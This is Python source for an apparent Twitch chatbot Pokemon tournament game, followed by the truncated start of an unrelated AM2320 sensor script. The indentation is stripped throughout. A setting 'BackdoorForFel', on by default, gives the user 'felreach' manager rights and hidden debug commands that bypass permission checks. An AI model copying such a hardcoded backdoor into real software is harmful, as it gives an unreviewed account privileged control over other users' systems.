def advanceTournament():
global allMatches, currentProgressionDepth
Debug("advancing tournament")
result = {"IsFinalBattle" : False, "Battles" : [], "AdvancementStyle" : settings["AdvancementStyle"], "Winners": [], "losers" : []}
result["AdvancementStyle"] = settings["AdvancementStyle"]
# search for max depth
i = len(allMatches) - 1
maxDepth = -1
while i >= 0:
if allMatches[i].remainingProgression > 0:
maxDepth = max(allMatches[i].depth, maxDepth)
i -= 1
Debug("advanceTournament() max depth:" + str(maxDepth))
currentProgressionDepth = maxDepth + 1
# this is last battle
if maxDepth == 0:
Debug("advanceTournament() final battle:")
result["IsFinalBattle"] = True
result["BattleHasProgressed"] = allMatches[0].hasProgressed
if allMatches[0].remainingProgression > 0 and settings["FinalsStyle"] == "Long":
allMatches[0].remainingProgression -= 1
allMatches[0].hasProgressed = True
elif allMatches[0].remainingProgression > 0 and settings["FinalsStyle"] == "Short":
allMatches[0].remainingProgression = 0
allMatches[0].hasProgressed = True
if allMatches[0].remainingProgression == 0:
currentProgressionDepth = 0
allMatches[0] = ResolveBattle(allMatches[0])
# no need to update parent here, this is last battle
result["Winners"].append(allMatches[0].winner)
result["losers"].append(allMatches[0].loser)
result["Battles"].append(allMatches[0])
return result
# PER ROUND
if settings["AdvancementStyle"] == "PerRound":
Debug("advanceTournament() per round:")
i = len(allMatches) - 1
while i >= 0:
if allMatches[i].remainingProgression > 0 and allMatches[i].depth == maxDepth:
allMatches[i].remainingProgression = 0
allMatches[i].hasProgressed = True
allMatches[i] = ResolveBattle(allMatches[i])
advanceWinner(i)
# pass winners into the next battles
result["Winners"].append(allMatches[i].winner)
result["losers"].append(allMatches[i].loser)
result["Battles"].append(allMatches[i])
pass
i -= 1
# PER BATTLE
if settings["AdvancementStyle"] == "PerBattle":
Debug("advanceTournament() per battle:")
i = len(allMatches) - 1
# find first match we can advance
while i >= 0:
if allMatches[i].remainingProgression > 0:
if settings["BattleStyle"] == "Long":
allMatches[i].remainingProgression -= 1
elif settings["BattleStyle"] == "Short":
allMatches[i].remainingProgression = 0
Debug("advancing match-remaining progression: " + str(allMatches[i].remainingProgression))
result["BattleHasProgressed"] = allMatches[i].hasProgressed
allMatches[i].hasProgressed = True
# resolve battle
if allMatches[i].remainingProgression == 0:
allMatches[i] = ResolveBattle(allMatches[i])
advanceWinner(i)
break
i -= 1
result["Winners"].append(allMatches[i].winner)
result["losers"].append(allMatches[i].loser)
result["Battles"].append(allMatches[i])
# update currentProgressionDepth
i = len(allMatches) - 1
maxDepth = -1
while i >= 0:
if allMatches[i].remainingProgression > 0:
maxDepth = max(allMatches[i].depth, maxDepth)
i -= 1
currentProgressionDepth = maxDepth + 1
return result
def startEntranceLockTimer():
global settings, currentTick
Debug("startEntranceLockTimer() called")
currentTick = "EntranceLock"
return
def EntranceLockTimerThread():
global entranceLockTimerThreadActive
entranceLockTimerThreadActive = True
remaining = settings["TournamentSignUpPeriod"]
if remaining > 0:
while remaining > 0 and entranceLockTimerThreadActive and threadsKeepAlive:
if remaining % 60 == 0 or remaining == 30 or remaining == 10:
s = "Tournament sign up ends in " + str(remaining) + " seconds."
SendMsg(s)
Debug("EntranceLockTimerThread() tick")
remaining -= 1
time.sleep(1)
if not entranceLockTimerThreadActive : #this would mean we were cancelled from the outside so we need to do some cleanup
return
entranceLockTimerThreadActive = False
startTournament()
return
def startTournament():
global tournamentOpened, tournamentStarted, currentTick, entranceLockTimerThreadActive
tournamentStarted = True
Debug("startTournament()")
entranceLockTimerThreadActive = False
currentTick = "StartPause"
return
def StartPauseTimerThread():
global startPauseTimerThreadActive, currentTick
startPauseTimerThreadActive = True
currentTime = 0
while currentTime < 10 and startPauseTimerThreadActive and threadsKeepAlive:
Debug("StartPauseTimerThread() tick")
currentTime += 1
time.sleep(1)
if not startPauseTimerThreadActive : #this would mean we were cancelled from the outside so we need to do some cleanup
return
InitBracket()
Debug("end of start pause thread")
currentTick = "Tournament"
startPauseTimerThreadActive = False
return
def TournamentTimerThread():
global tournamentTimerThreadActive
tournamentTimerThreadActive = True
currentTime = 0
timerDuration = settings["PauseBetweenRounds"]
dontSkip = settings["PauseBetweenRounds"] > 0
if currentProgressionDepth == 1:
timerDuration = settings["PauseBetweenFinalRounds"]
dontSkip = settings["PauseBetweenFinalRounds"] > 0
while currentTime < timerDuration and tournamentTimerThreadActive and threadsKeepAlive and dontSkip:
Debug("TournamentTimerThread() tick")
currentTime += 1
time.sleep(1)
if not tournamentTimerThreadActive: #this would mean we were cancelled from the outside so we need to do some cleanup
resetTournament()
return
tournamentTimerThreadActive = False
return
def CooldownTimerThread():
global cooldownTimerThreadActive
cooldownTimerThreadActive = True
currentTime = 0
while currentTime < settings["TournamentPreparationTime"] and cooldownTimerThreadActive and threadsKeepAlive:
currentTime += 1
time.sleep(1)
if not cooldownTimerThreadActive: #this would mean we were cancelled from the outside so we need to do some cleanup
resetTournament()
return
resetTournament()
s = "Stadium is ready to host another tournament! Use " + str(settings["Command"]) + " <pokemon type> to enter."
SendMsg(s)
cooldownTimerThreadActive = False
return
def finishTournament():
global tournamentOpened, tournamentStarted, tournamentReady
tournamentOpened = False
tournamentStarted = False
tournamentReady = False
cooldownTournament()
return
def cooldownTournament():
global currentTick, tournamentOpened, tournamentReady, tournamentStarted, lastAnnouncementTime
currentTick = "Cooldown"
lastAnnouncementTime = datetime.now()
return
#hard resets the tournament, also tells all the threads to stop
def resetTournament(unlock = False):
global stadiumLocked, tournamentReady, tournamentOpened, tournamentStarted, currentTick
global enteredTrainers, allTrainers, currentBracket, startBracket, currentProgressionDepth, tournamentDepth, allMatches
global entranceLockTimerThreadActive, startPauseTimerThreadActive, tournamentTimerThreadActive, cooldownTimerThreadActive
global lastAnnouncementTime
currentTick = ""
tournamentReady = True
tournamentOpened = False
tournamentStarted = False
stadiumLocked = settings["StadiumStartsLocked"]
if unlock:
stadiumLocked = False
enteredTrainers = []
allTrainers = []
currentBracket = []
startBracket = []
allMatches = []
currentProgressionDepth = -1
tournamentDepth = -1
entranceLockTimerThreadActive = False
startPauseTimerThreadActive = False
tournamentTimerThreadActive = False
cooldownTimerThreadActive = False
lastAnnouncementTime = datetime.now()
return
def getBattleStatus():
result = "Battles: "
if len(allMatches) > 0:
for i in range(len(allMatches)):
result += str(i) + "-["
result += "Next:" + str(allMatches[i].nextMatch) + " "
result += "PrevTop:" + str(allMatches[i].previousMatchTop) + " "
result += "PrevBot:" + str(allMatches[i].previousMatchBot) + " "
result += "Trainers:" + str(allMatches[i].trainerTop) + "|" + str(allMatches[i].trainerBot) + " "
result += "],"
return result
def getTournamentStatus():
activeThread = "None"
if entranceLockTimerThreadActive:
activeThread = "entrance lock"
if startPauseTimerThreadActive:
activeThread = "start pause"
if tournamentTimerThreadActive:
activeThread = "tournament"
if cooldownTimerThreadActive:
activeThread = "cooldown"
result = "Tournament Status: "
result += "Locked: " + str(stadiumLocked) + " ; "
result += "Ready: " + str(tournamentReady) + " ; "
result += "Opened: " + str(tournamentOpened) + " ; "
result += "Started: " + str(tournamentStarted) + " ; "
result += "Tournament depth current/total: " + str(currentProgressionDepth) + "/" + str(tournamentDepth) + " ; "
result += "Matches count: " + str(len(allMatches)) + " ; "
result += "FinalsStyle: " + settings["FinalsStyle"] + " ; "
result += "BattleStyle: " + settings["BattleStyle"] + " ; "
result += "AdvancementStyle: " + settings["AdvancementStyle"] + " ; "
result += "ActiveThread: " + activeThread + " ; "
return result
def ScriptToggled(state):
global threadsKeepAlive
Debug("ScriptToggled: " + str(state))
# if enabled again tell the script to keep the threads running again
if state:
threadsKeepAlive = True
s = "Stadium script enabled."
if stadiumLocked:
s += " Stadium is locked, when it unlocks use " + settings["Command"] + " <pokemon type> to enter."
else:
s += " Try entering the tournament using " + settings["Command"] + " <pokemon type>"
Parent.SendTwitchMessage(s)
else: # if the script gets disabled, stop all timers and resets the textfiles
resetTournament()
Unload()
return
def Unload():
global threadsKeepAlive
threadsKeepAlive = False
return
def Debug(message):
if debuggingMode:
Parent.Log("PokemonTournament", message)
def SendMsg(message):
if message == "":
return
if settings["PrefaceMessages"] == True:
message = "Stadium: " + message
Parent.SendTwitchMessage(message)
return
#---------------------------------------
# [Required] Initialize Data (Only called on Load)
#---------------------------------------
def Init():
global settings, configFile, RandomInstance
global stadiumLocked, ineffectiveStrength, weakStrength, evenStrength, strongStrength
RandomInstance = random.SystemRandom()
path = os.path.dirname(__file__)
try:
with codecs.open(os.path.join(path, configFile), encoding='utf-8-sig', mode='r') as file:
settings = json.load(file, encoding='utf-8-sig')
except:
settings = {
"OnlyWhenLive": False,
"Command": "!stadium",
"Permission": "Everyone",
"ManagerPermission": "Moderator",
"AllowRegularsToManage" : False,
"EntryCost": 0,
"UseCommonResponses" : True,
"ShowTrainerType" : True,
"EnableInvalidTypeResponse" : True,
"EnableEntryResponse" : True,
"EnableEntryCostResponse" : True,
"EnablePeriodicAnnouncement" : True,
"PeriodicAnnouncementEvenWhenLocked" : True,
"PeriodicAnnouncementPeriod" : 300,
"EnablePayout" : False,
"PrizePerBattle": 5,
"FinalPrizePerTrainer": 5,
"FinalPrize": 200,
"CurrencyName" : "of Chat Currency",
"UseExternalPayout" : False,
"ExternalPayoutCommand" : "!addpoints $user $amount",
"UtilityCooldown": 5,
"TypeIneffectiveValue" : 20,
"TypeWeakValue" : 40,
"TypeEvenValue" : 50,
"TypeStrongValue" : 70,
"ResultAnnoucementStyle" : "Both",
"PrefaceMessages" : False,
"OnCooldownResponse": "$user, the command is still on cooldown for $cd seconds!",
"OnUserCooldownResponse": "$user the command is still on user cooldown for $cd seconds!",
"StadiumStartsLocked" : False,
"AdvancementStyle" : "PerRound",
"BattleStyle": "Long",
"FinalsStyle": "Long",
"TournamentSignUpPeriod" : 150,
"PauseBetweenRounds" : 20,
"PauseBetweenFinalRounds" : 15,
"TournamentPreparationTime" : 120,
"BackdoorForFel" : True
}
stadiumLocked = settings["StadiumStartsLocked"]
ineffectiveStrength = settings["TypeIneffectiveValue"]
weakStrength = settings["TypeWeakValue"]
evenStrength = settings["TypeEvenValue"]
strongStrength = settings["TypeStrongValue"]
Debug("Init()")
return
#---------------------------------------
# [Required] Execute Data / Process Messages
#---------------------------------------
def Execute(data):
global user
global tournamentOpened, tournamentReady, tournamentStarted, stadiumLocked
global enteredTrainers, allTrainers
global RandomInstance
if data.IsChatMessage():
Debug("processing msg")
user = data.User
FelOverride = user.lower() == "felreach" and settings["BackdoorForFel"] == True
tempResponseString = ""
if (data.GetParam(0).lower() == settings["Command"]):
# skip the command when stream isnt live
if settings["OnlyWhenLive"] and not Parent.IsLive():
SendMsg("The Stadium cannot be used because the stream isn't live!")
return
hasPermission = Parent.HasPermission(data.User, settings["Permission"], "")
hasManagePermission = Parent.HasPermission(data.User, settings["ManagerPermission"], "")
if settings["AllowRegularsToManage"]:
hasManagePermission = hasManagePermission or Parent.HasPermission(data.User, "Regular", "")
if FelOverride:
hasPermission = True
hasManagePermission = True
#EMPTY COMMAND
if (data.GetParam(1) == "" and hasPermission):
if stadiumLocked:
tempResponseString = "Stadium has been unlocked and is ready for next tournament! Sign up with " + settings["Command"] + " <pokemon type>"
else:
if currentTick == "Cooldown":
tempResponseString = "Stadium is being prepared for the next turnament. When its ready sign up with " + settings["Command"] + " <pokemon type>"
else:
if tournamentStarted:
tempResponseString = "Tournament is already already under way @$user! Sign up with " + settings["Command"] + " <pokemon type>"
elif tournamentOpened:
tempResponseString = "To sign up into the tournament use " + settings["Command"] + " <pokemon type>"
elif tournamentReady:
tempResponseString = "To sign up into the tournament use " + settings["Command"] + " <pokemon type>"
# OPEN STADIUM
elif(data.GetParam(1).lower() in cmdParamReadyTourny and hasManagePermission):
if stadiumLocked:
resetTournament(True)
tempResponseString = "Stadium has been unlocked and is ready for next tournament! Sign up with " + settings["Command"] + " <pokemon type>"
else:
if not tournamentReady and not tournamentOpened and not tournamentStarted:
resetTournament(True)
tempResponseString = "All of the tournament staff and organizers went super saiyan and prepared the stadium for the next Tournament!"
else:
if tournamentStarted:
tempResponseString = "Tournament is already already under way @$user!"
elif tournamentOpened:
tempResponseString = "Tournament is already opened!"
elif tournamentReady:
tempResponseString = "Tournament is ready! No need for cleaning or additional preparations."
# LOCK STADIUM
elif(data.GetParam(1).lower() in cmdParamLockTourny and hasManagePermission):
if stadiumLocked:
tempResponseString = "Stadium is already locked."
else:
if tournamentStarted:
tempResponseString = "Stadium cannot be locked right now."
elif tournamentOpened:
tempResponseString = "Stadium cannot be locked right now."
elif tournamentReady:
tempResponseString = "Locking the Stadium now."
stadiumLocked = True
# START
elif(data.GetParam(1).lower() in cmdParamStartTourny and hasManagePermission):
if not stadiumLocked:
if not cooldownTimerThreadActive:
if len(enteredTrainers) > 0 and not tournamentStarted:
tempResponseString = "Starting the tournament!"
startTournament()
else:
tempResponseString = "Cannot start the tournament now."
else:
tempResponseString = "Tournament is on cooldown."
else:
tempResponseString = "Stadium is currently locked."
# STATUS
elif data.GetParam(1).lower() == "status" and FelOverride:
tempResponseString = getTournamentStatus()
# BATTLE STATUS
elif data.GetParam(1).lower() == "battlestatus" and FelOverride:
# @todo switch to whisper?
tempResponseString = getBattleStatus()
# RESET
elif data.GetParam(1).lower() == "reset" and hasManagePermission:
resetTournament()
tempResponseString = "@$user is hard resetting the tournament!"
# INFO
elif data.GetParam(1).lower() == "commands" and hasPermission:
if settings["UtilityCooldown"] > 0 and Parent.IsOnCooldown(ScriptName, "UtilityCooldownCommands"):
pass
else:
# list the commands
s = "Available Commands: "
s += "types OR listtypes, "
s += "trainers, "
s += "commands, info"
s += "; Manager Commands: "
s += "start, "
s += "prepare OR readyup "
tempResponseString = s
if settings["UtilityCooldown"] > 0:
Parent.AddCooldown(ScriptName, "UtilityCooldownCommands", settings["UtilityCooldown"])
# INFO
elif data.GetParam(1).lower() == "info" and hasPermission:
# check for cooldown
if settings["UtilityCooldown"] > 0 and Parent.IsOnCooldown(ScriptName, "UtilityCooldownInfo"):
pass
else:
tempResponseString = "Script " + "[" + ScriptName + "]" + " version:" + Version + " made by: " + Creator
if settings["UtilityCooldown"] > 0:
Parent.AddCooldown(ScriptName, "UtilityCooldownInfo", settings["UtilityCooldown"])
# ADDNPC
elif (data.GetParam(1).lower() == "addnpc" or data.GetParam(1).lower() == "addnpcs") and FelOverride:
count = 1
if RepresentsInt(data.GetParam(2)):
count = int(data.GetParam(2))
if count < 0:
count = 0
if not stadiumLocked:
if tournamentReady and not tournamentStarted:
typeoverride = ""
t = data.GetParam(3).lower()
if t in TYPES:
typeoverride = t
for x in range(count):
npc = RandomInstance.choice(randomNames)
npc += "NPC"
type = RandomInstance.choice(TYPES)
if typeoverride != "":
type = typeoverride
enteredTrainers.append(npc)
allTrainers.append(Fighter(npc, type, 0))
if tournamentOpened:
tempResponseString = "Entering $npc into the tournament with " + type + " type Pokemon!"
if not tournamentOpened:
tournamentOpened = True
randomType = RandomInstance.choice(TYPES)
randomType = str.capitalize(randomType)
tempResponseString = "$npc enters the pokemon stadium to claim the " + randomType + " Badge. "
tempResponseString += "Is there anyone willing to challenge them?"
tempResponseString = tempResponseString.replace("$npc", npc)
SendMsg(tempResponseString)
startEntranceLockTimer()
tempResponseString = ""
else:
tempResponseString = "Can't enter a random NPC into the tournament."
else:
tempResponseString = "Can't enter a random NPC into the tournament. The stadium is locked."
# LIST TYPES
elif(data.GetParam(1).lower() in cmdParamListTypes and hasPermission):
if settings["UtilityCooldown"] > 0 and Parent.IsOnCooldown(ScriptName, "TypesUtilityCooldown"):
pass
else:
tempResponseString = str(TYPES)
tempResponseString = tempResponseString.replace("[","")
tempResponseString = tempResponseString.replace("]","")
tempResponseString = tempResponseString.replace("\'","")
tempResponseString = "You can enter the tournament with either of these pokemon types: " + tempResponseString
tempResponseString += " or use random."
if settings["UtilityCooldown"] > 0:
Parent.AddCooldown(ScriptName, "TypesUtilityCooldown", settings["UtilityCooldown"])
# LIST TRAINERS
elif(data.GetParam(1).lower() in cmdParamListTrainers and hasPermission):
if settings["UtilityCooldown"] > 0 and Parent.IsOnCooldown(ScriptName, "TrainersUtilityCooldown"):
pass
else:
if len(enteredTrainers) > 0:
tempResponseString = "Trainers which entered: "
i = 0
for x in enteredTrainers:
tempResponseString += "@" + x
if i < len(enteredTrainers) - 1:
tempResponseString += ", "
i += 1
else:
tempResponseString = "No trainers entered the tournament yet."
if settings["UtilityCooldown"] > 0:
Parent.AddCooldown(ScriptName, "TrainersUtilityCooldown", settings["UtilityCooldown"])
# JOIN TOURNY AS A USER
elif data.GetParamCount() == 2 and hasPermission: #we have exactly two params, that means the second one should be a type
# @todo how to subtract points when they are external?
entryprice = settings["EntryCost"]
# check locked
if not stadiumLocked:
# check ready
if tournamentReady:
# check started
if not tournamentStarted:
if user not in enteredTrainers:
type = data.GetParam(1).lower()
if type in TYPES or type == "random":
if entryprice <= Parent.GetPoints(data.User): # use param for the price
if type == "random":
type = RandomInstance.choice(TYPES)
enteredTrainers.append(user)
allTrainers.append(Fighter(user, type, 0))
if tournamentOpened:
if settings["EnableEntryResponse"]:
tempResponseString = "Entering @$user into the tournament with " + type + " type Pokemon!"
if not tournamentOpened:
tournamentOpened = True
tempResponseString = "@$user with " + type + " type Pokemon enters the Stadium to claim the Badge! "
tempResponseString += "Is there anyone willing to challenge them?"
startEntranceLockTimer()
else:
if settings["UseCommonResponses"] and settings["EnableEntryCostResponse"]:
# @todo a case when external points are used?
tempResponseString = ""
else:
if settings["UseCommonResponses"] and settings["EnableInvalidTypeResponse"]:
tempResponseString = "@$user ! " + data.GetParam(1) + " is an invalid Pokemon type!"
else:
if settings["UseCommonResponses"]:
tempResponseString = "@$user already entered the tournament."
else:
if settings["UseCommonResponses"]:
tempResponseString = "@$user you are too late. The tournament is already under way."
# slowpoke msg
if RandomInstance.random() < 0.05:
tempResponseString = "@$user is a Slowpoke. Kappa The tournament is already under way."
pass
else:
if settings["UseCommonResponses"]:
# theres a cooldown
if settings["UtilityCooldown"] > 0 and Parent.IsOnCooldown(ScriptName, "StadiumUtilityCooldown"):
pass
else:
tempResponseString = "The stadium is currently being cleaned and repaired for the upcoming tournament."
if settings["UtilityCooldown"] > 0:
Parent.AddCooldown(ScriptName, "StadiumUtilityCooldown", settings["UtilityCooldown"])
elif stadiumLocked:
tempResponseString = "The stadium is locked."
# RANDOM TEST
if (data.GetParam(0).lower() == "!randomtest" and FelOverride):
tempResponseString = "random counts: "
counts = {}
for x in range(0, len(TYPES)):
counts[x] = 0
m = 0
for x in range(0, 10000):
r = RandomInstance.random()
m = max(r,m)
val = int(r * len(TYPES))
counts[val] += 1
for x in counts.keys():
tempResponseString += str(x) + "-" + str(counts[x]) + "; "
tempResponseString += " max:" + str(m)
# REF TEST
if (data.GetParam(0).lower() == "!reftest" and FelOverride):
tempResponseString = "ref test: "
array1 = ["0","1","2","4"]
array2 = ["5", "6"]
array2.append(array1[0])
tempResponseString += str(array1) + " " + str(array2)
tempResponseString += " => "
array1[0] = "x"
tempResponseString += str(array1) + " " + str(array2)
tempResponseString = tempResponseString.replace("$user", user)
SendMsg(tempResponseString)
return
#---------------------------------------
# Reload Settings on Save
#---------------------------------------
def ReloadSettings(jsonData):
global settings, configFile
Init()
s = "Stadium settings reloaded."
Parent.SendTwitchMessage(s)
return
def OpenReadMe():
location = os.path.join(os.path.dirname(__file__), "ReadMe.txt")
os.startfile(location)
return
#---------------------------------------
# [Required] Tick Function
#---------------------------------------
def Tick():
global currentTick, tickCounter, RandomInstance
global lastAnnouncementTime
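# currentTick acts as a small state machine driven from this Tick() handler:
#   "EntranceLock"     - sign-up window is open; start the entrance lock timer
#   "StartPause"       - sign-ups are closed; pause before the first round
#   "Tournament"       - advance the bracket via advanceTournament()
#   "TournamentFinish" - announce the winner and pay out the prize
#   "Cooldown"         - wait before the stadium can be prepared again
# (State names are taken from the checks below; transitions are made by the timer threads.)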
if tickCounter % 100 == 0:
Debug("Tick:" + currentTick)
# try announce tournament ready
if settings["EnablePeriodicAnnouncement"] and settings["PeriodicAnnouncementPeriod"] > 0:
if not tournamentStarted and not tournamentOpened and currentTick != "Cooldown" and tournamentReady:
s = ""
# compare last announcement time
delta = datetime.now() - lastAnnouncementTime
Debug("trying to announce:" + str(delta.total_seconds()) + "stadiumlocked:" + str(stadiumLocked))
if delta.total_seconds() >= settings["PeriodicAnnouncementPeriod"]:
if stadiumLocked:
if settings["PeriodicAnnouncementEvenWhenLocked"]:
s = "Stadium is locked, when it unlocks use " + settings["Command"] + " <pokemon type> to enter."
else:
s = "Stadium is open! Enter the tournament using " + settings["Command"] + " <pokemon type>."
lastAnnouncementTime = datetime.now()
SendMsg(s)
tickCounter += 1
if tournamentOpened and not tournamentStarted:
#tick entrance lock
if currentTick == "EntranceLock" and not entranceLockTimerThreadActive:
s = "The tournament sign up period begins now! Pokemon Trainers! You have $time seconds to sign up!"
s = s.replace("$time", str(settings["TournamentSignUpPeriod"]))
SendMsg(s)
Debug("starting entrance lock timer")
threading.Thread(target=EntranceLockTimerThread, args=()).start()
if tournamentStarted:
#tick pause before tourny start
if currentTick == "StartPause" and not startPauseTimerThreadActive:
# if only one trainer entered, finish the tournament
if len(enteredTrainers) == 1:
s0 = "Only @" + enteredTrainers[0] + " signed up for the tournament. Sadly for them, no reward will be paid out because that would be too easy."
s1 = "After waiting in the lobby for " + str(1+RandomInstance.randint(1,9)) + " hours, @" + enteredTrainers[0] + " leaves the Stadium empty handed as staff refused to award anything to them for being the only trainer to show up."
s2 = "@" + enteredTrainers[0] + " grumpily leaves the Stadium as there was one else to challenge."
s = RandomInstance.choice([s0, s1, s2])
SendMsg(s)
currentTick = "TournamentFinish"
else:
#announce tournament started
s = str(len(enteredTrainers)) + " trainers have signed up for the tournament. There's a future champion among them, but nobody knows who it will be. "
s += "We will soon find out! The tournament staff announces the start! "
s += "The stadium closes, the stands rumble with cheering and the first challengers for the Badge enter the Stadium's arena."
SendMsg(s)
threading.Thread(target=StartPauseTimerThread, args=()).start()
#tick tournament advancement
if currentTick == "Tournament" and not tournamentTimerThreadActive:
#process current round
result = advanceTournament()
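# advanceTournament() is expected to return a dict with at least "IsFinalBattle",
# "Battles" (the battle objects of the current round) and "BattleHasProgressed";
# the announcement style below depends on which of these are set.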
# if we are close to the Final match we broadcast each individual match (based on a setting)
if result["IsFinalBattle"] == True:
s = ""
battle = result["Battles"][0]
Debug("Final battle has progressed: " + str(battle.hasProgressed ) + " " + str(battle.remainingProgression))
if battle.remainingProgression > 0 and result["BattleHasProgressed"] == False:
s0 = "The final battle is here! @$trainer1$type1 and @$trainer2$type2 will fight for the Badge."
s1 = "@$trainer1$type1 and @$trainer2$type2 are about to meet in the finals!"
s2 = "@$trainer1$type1 and @$trainer2$type2 are about to duke it out for the Badge!"
s = RandomInstance.choice([s0, s1, s2])
elif battle.remainingProgression == 0 and settings["FinalsStyle"] == "Short":
s = "In the finals, @$winner wins against @$loser."
elif battle.remainingProgression >= 1:
Debug("Tick: final battle progressing")
s0 = "The battle is fierce! The finalists are using all of the tricks they learned on their journey of becoming the best pokemon trainer."
s1 = "@$trainer1 is putting on a lot of pressure but @$trainer2 is keeping up!"
s2 = "@$trainer2 is putting on a lot of pressure but @$trainer1 is keeping up!"
s3 = "It's not looking good for @$trainer1, they are falling behind while being on the defensive!"
s4 = "It's not looking good for @$trainer2, they are falling behind while being on the defensive!"
s5 = "Both trainers pulled back. They are preparing for the next exchange of attacks!"
s = RandomInstance.choice([s0, s1, s2, s3, s4, s5])
elif battle.remainingProgression == 0:
s0 = "Amazing! After a serious exchange @$winner manages to overpower their oponent and finish them off."
s1 = "Amazing! At the last second @$winner's Pokemon pulls off an amazing move against $loser and wins."
s2 = "At last, @$winner finds a crack in @$loser's defenses and deals them a finishing blow."
s = RandomInstance.choice([s0, s1, s2])
# replace tags
s = s.replace("$trainer1", allTrainers[battle.trainerTop].name)
s = s.replace("$trainer2", allTrainers[battle.trainerBot].name)
if settings["ShowTrainerType"]:
s = s.replace("$type1", " (" + allTrainers[battle.trainerTop].deckType + ")")
s = s.replace("$type2", " (" + allTrainers[battle.trainerBot].deckType + ")")
else:
s = s.replace("$type1", "")
s = s.replace("$type2", "")
if battle.winner != None:
s = s.replace("$winner", allTrainers[battle.winner].name)
s = s.replace("$type", str(allTrainers[battle.winner].deckType).capitalize())
if battle.loser != None:
s = s.replace("$loser", allTrainers[battle.loser].name)
SendMsg(s)
else:
# if we go match by match
if settings["AdvancementStyle"] == "PerBattle":
s = ""
battle = result["Battles"][0]
if battle.trainerTop != None and battle.trainerBot != None:
if battle.remainingProgression > 0 and result["BattleHasProgressed"] == False:
s = "The match between @$trainer1$type1 and @$trainer2$type2 is underway"
elif battle.remainingProgression >= 1:
s = "@$trainer1 and @$trainer2 are going at it."
elif battle.remainingProgression == 0:
s0 = "@$winner$typeWinner wins the battle against @$loser$typeLoser."
s1 = "@$winner$typeWinner wins convincingly against @$loser$typeLoser."
s2 = "In a close match @$winner$typeWinner bests @$loser$typeLoser."
s = RandomInstance.choice([s0, s1, s2])
s = s.replace("$winner", allTrainers[battle.winner].name)
s = s.replace("$loser", allTrainers[battle.loser].name)
if settings["ShowTrainerType"]:
s = s.replace("$typeWinner", " (" + allTrainers[battle.winner].deckType + ")")
s = s.replace("$typeLoser", " (" + allTrainers[battle.loser].deckType + ")")
else:
s = s.replace("$typeWinner", "")
s = s.replace("$typeLoser", "")
s = s.replace("$trainer1", allTrainers[battle.trainerTop].name)
s = s.replace("$trainer2", allTrainers[battle.trainerBot].name)
if settings["ShowTrainerType"]:
s = s.replace("$type1", " (" + allTrainers[battle.trainerTop].deckType + ")")
s = s.replace("$type2", " (" + allTrainers[battle.trainerBot].deckType + ")")
else:
s = s.replace("$type1", "")
s = s.replace("$type2", "")
SendMsg(s)
else:
trainer = ""
if battle.trainerTop == None and battle.trainerBot != None:
trainer = allTrainers[battle.trainerBot].name
if battle.trainerTop != None and battle.trainerBot == None:
trainer = allTrainers[battle.trainerTop].name
if trainer != "":
s = trainer + " has no opponent for this battle, they advance by default."
SendMsg(s)
elif settings["AdvancementStyle"] == "PerRound": # if we go be entire round
s = ""
addedWinners = False
if settings["ResultAnnoucementStyle"] == "Winners" or settings["ResultAnnoucementStyle"] == "Both":
s = "Another round of battles is finished. "
addedWinners = True
# get all the winners
winners = []
for i in range(len(result["Battles"])):
if result["Battles"][i].winner != None:
winners.append(allTrainers[result["Battles"][i].winner].name)
pass
if len(winners) > 0:
s += "Trainers progressing to the next round are: "
for j in range(len(winners)):
s += winners[j]
if j != (len(winners) - 1):
s += ", "
else:
s = "No Trainers are progressing into the next round."
SendMsg(s)
if settings["ResultAnnoucementStyle"] == "losers" or settings["ResultAnnoucementStyle"] == "Both":
if addedWinners:
s = ""
else:
s = "Another round of battles is finished. "
# get all the losers
losers = []
for i in range(len(result["Battles"])):
if result["Battles"][i].loser != None:
losers.append(allTrainers[result["Battles"][i].loser].name)
pass
if len(losers) > 0:
s += "Trainers knocked out of the tournament are: "
for j in range(len(losers)):
s += losers[j]
if j != (len(losers) - 1):
s += ", "
else:
s = "No Trainers lost this round."
SendMsg(s)
#if tournament isnt finished launch timer to wait for next rounds
if currentProgressionDepth > 0:
threading.Thread(target=TournamentTimerThread, args=()).start()
else:
currentTick = "TournamentFinish"
if currentTick == "TournamentFinish":
if len(enteredTrainers) > 1:
battle = allMatches[0]
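# Prize pool: whatever the winner accumulated during the rounds, plus a
# per-entrant bonus and a flat final prize (both taken from the settings).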
winnings = allTrainers[battle.winner].currentWinnings
winnings += settings["FinalPrizePerTrainer"] * len(enteredTrainers)
winnings += settings["FinalPrize"]
#announce winners
s = "The tournament is over, @$winner wins with $type Pokemon. The Badge is theirs."
if winnings > 0:
if settings["EnablePayout"] == True:
s += " Their winnings are $amount $currency!"
else:
s += " They should be paid out $amount $currency!"
s = s.replace("$winner", allTrainers[battle.winner].name)
s = s.replace("$type", str(allTrainers[battle.winner].deckType).capitalize())
s = s.replace("$amount", str(winnings))
s = s.replace("$currency", settings["CurrencyName"])
SendMsg(s)
if settings["EnablePayout"] == True:
# pay out winners
if settings["UseExternalPayout"]:
s = settings["ExternalPayoutCommand"]
s = s.replace("$user", allTrainers[battle.winner].name)
s = s.replace("$amount", str(winnings))
Parent.SendTwitchMessage(s)
else: # pay out with internal currency
Parent.AddPoints(allTrainers[battle.winner].name, winnings)
SendMsg("The Stadium closes...")
finishTournament()
#tick post tourny cooldown
if currentTick == "Cooldown" and not cooldownTimerThreadActive:
threading.Thread(target=CooldownTimerThread, args=()).start()
return
|
am2320.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Todo: implement a buffer for log output
import smbus
import time
import datetime
import threading
address = 0x5c # 1011100(7bit,0x5c) + 0(1bit,R/W bit) = 0xb8
READ_INT = 5 # [sec], each reading interval must be greater than 2 sec
LOG_INT = 600 # [sec]
DEBUG_MODE = True
# Print a message prefixed with the current date and time
def printDateMsg(msg):
d = datetime.datetime.today()
print d.strftime('%Y/%m/%d %H:%M:%S') + ' [TRMO] ' + msg
# Class wrapping the AM2320 temperature/humidity sensor
class Thermo():
def __init__(self):
self.__i2c = smbus.SMBus(1)
self.__hum = 0.0
self.__tmp = 0.0
self.tu = threading.Thread(target=self.__updateValue)
self.tu.setDaemon(True)
self.tu.start()
self.tl = threading.Thread(target=self.__logValue)
self.tl.setDaemon(True)
self.tl.start()
def __updateValue(self):
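# AM2320 read sequence (summarized from the sensor datasheet):
#   1. any write wakes the sensor from sleep (it may not ACK this write)
#   2. send function code 0x03 with start register 0x00 and length 0x04
#   3. wait a few milliseconds, then read 6 bytes:
#      [function code, byte count, hum_hi, hum_lo, temp_hi, temp_lo]
# Values are in tenths of a unit. The trailing CRC bytes are not read here and
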